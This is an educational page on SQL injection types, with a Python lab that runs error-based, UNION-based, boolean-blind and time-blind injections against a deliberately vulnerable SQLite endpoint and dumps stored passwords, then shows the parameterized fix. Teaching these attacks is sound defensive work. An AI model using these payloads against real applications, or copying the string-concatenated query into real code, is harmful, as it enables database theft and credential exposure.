Discover the various types of SQL injection (SQLi) attacks, such as classic (in-band) SQLi, blind (inferential) SQLi, and out-of-band SQLi.
Understand how each type targets web applications, the risks involved, and best practices to secure your database from these common vulnerabilities.
Types of SQLi:
1: In-band SQLi
- Error-based SQLi
- Union-based SQLi
2: Inferential (Blind) SQLi
- Boolean-based Blind SQLi
- Time-based Blind SQLi
3: Out-of-band SQLi
1: Error-based SQLi:
1: Relies on error messages thrown by the database server.
2: When the application relays those raw messages to the client, the attacker uses them to confirm the injection point, identify the DBMS, and obtain information about the structure of the database.
3: Only works if detailed database errors reach the HTTP response; returning generic error pages removes this channel (but not the injection itself).
2: Union-based SQLi:
1: Leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result set.
2: The combined rows are returned as part of the normal HTTP response, so data from other tables appears where the application expected its own.
3: The injected SELECT must return the same number of columns, with compatible types, as the original query.
3: Inferential SQLi:
1: Also known as Blind SQLi: the application returns neither query results nor database errors, so the attacker infers results from the application's behaviour.
2: Takes more time to carry out than in-band SQLi, since each request yields at most one bit of information.
3: Boolean-based Blind SQLi.
4: Time-based Blind SQLi.
4: Boolean-based Blind SQLi:
1: Relies on sending an SQL query that forces the application to return a different result depending on whether the injected condition evaluates to TRUE or FALSE.
2: The observable difference (a row shown or not, a different page length, a different status code) is the only information channel.
5: Time-based Blind SQLi:
1: Injects a conditional delay (for example SLEEP() in MySQL, WAITFOR DELAY in MSSQL, pg_sleep() in PostgreSQL) that forces the database to wait for a specified time only when the condition is TRUE.
2: The response time indicates the result of the TRUE/FALSE query.
3: This attack is typically slow, since data is enumerated character by character and every TRUE probe costs at least the chosen delay.
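The in-band and inferential techniques listed above, worked end to end as an added example (this code is not from the original page). It assumes an in-memory SQLite database with constructed users and products tables, a hypothetical vulnerable endpoint that concatenates its id parameter into the query, and a Python-registered sleep() function standing in for MySQL's SLEEP(), because SQLite has no such built-in. The hardened endpoint beside it shows the same query with a bound parameter.

```python
import sqlite3
import time

# Constructed sample data for this example: an in-memory SQLite database
# standing in for the application's real backend (an assumption made here).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, price INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)",
                     [(1, "Widget", 10), (2, "Gadget", 25)])
    # SQLite has no SLEEP(); register a Python-backed one so the time-based
    # probe has something to call. It stands in for MySQL's SLEEP() or
    # PostgreSQL's pg_sleep() (an assumption of this example).
    conn.create_function("sleep", 1, lambda secs: time.sleep(secs) or 0)
    return conn

# Vulnerable endpoint: the user-supplied id is concatenated into the SQL text.
def vulnerable_product(conn, product_id):
    sql = f"SELECT name, price FROM products WHERE id = {product_id}"
    return conn.execute(sql).fetchall()

# Hardened endpoint: identical query, but the value travels as a bound
# parameter, so it is never parsed as SQL.
def safe_product(conn, product_id):
    sql = "SELECT name, price FROM products WHERE id = ?"
    return conn.execute(sql, (product_id,)).fetchall()

# In-band, error-based: malformed input makes the database throw, and a
# server that relays the raw message confirms the injection point and the
# DBMS dialect. Returns the leaked message, or None if nothing leaked.
def error_probe(conn):
    try:
        vulnerable_product(conn, "1'")
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)

# In-band, union-based: the original SELECT has two columns, so the injected
# SELECT supplies two; id = 0 matches nothing, so only attacker rows return.
def union_attack(conn):
    payload = "0 UNION ALL SELECT username, password FROM users"
    return vulnerable_product(conn, payload)

# Inferential, boolean-based: the only signal is whether product 1 is shown.
def boolean_oracle(conn, condition):
    rows = vulnerable_product(conn, f"1 AND ({condition})")
    return len(rows) > 0

# Character-by-character enumeration through the boolean oracle.
def extract_password(conn, username, max_len=32):
    charset = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = (f"(SELECT substr(password, {pos}, 1) FROM users "
                    f"WHERE username = '{username}') = '{ch}'")
            if boolean_oracle(conn, cond):
                recovered += ch
                break
        else:
            break  # no character matched: end of the string reached
    return recovered

# Inferential, time-based: used when even the row count is hidden. The delay
# fires only if the condition is TRUE, so latency becomes the oracle.
def time_probe(conn, condition, delay=0.2):
    payload = f"1 AND CASE WHEN ({condition}) THEN sleep({delay}) ELSE 0 END"
    start = time.perf_counter()
    vulnerable_product(conn, payload)
    return time.perf_counter() - start >= delay * 0.9

if __name__ == "__main__":
    conn = make_db()
    print("error leaked:", error_probe(conn))
    print("union dump:", union_attack(conn))
    print("boolean-blind password:", extract_password(conn, "alice"))
    print("time-blind 1=1 delayed:", time_probe(conn, "1=1"))
    print("time-blind 1=2 delayed:", time_probe(conn, "1=2"))
    print("union payload against safe endpoint:",
          safe_product(conn, "0 UNION ALL SELECT username, password FROM users"))
```

Run the file directly to see each channel in turn. The same union payload handed to safe_product returns no rows because the driver binds it as a value compared against the integer column rather than splicing it into the statement; that is the whole fix, and it applies equally to every variant above. The boolean-based routine also makes the cost of blind techniques concrete: recovering a six-character value takes up to 36 requests per position, and the time-based variant adds the delay on every TRUE probe.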
Summary of SQLi categories:

Category                 | Technique           | How the result comes back
-------------------------+---------------------+--------------------------------------------
In-band SQLi             | Error-based         | Injected SQL produces an error; results
                         |                     |   appear in the application's response
In-band SQLi             | Union-based         | Injected SQL produces multiple result sets;
                         |                     |   results appear in the application's response
Blind (Inferential) SQLi | Boolean-based Blind | Conditions (different response for
                         |                     |   TRUE vs. FALSE)
Blind (Inferential) SQLi | Time-based Blind    | Response time
Out-of-Band SQLi         | Export results      | External system: mail address, file,
                         |                     |   remote server
For more information, visit SQL Injection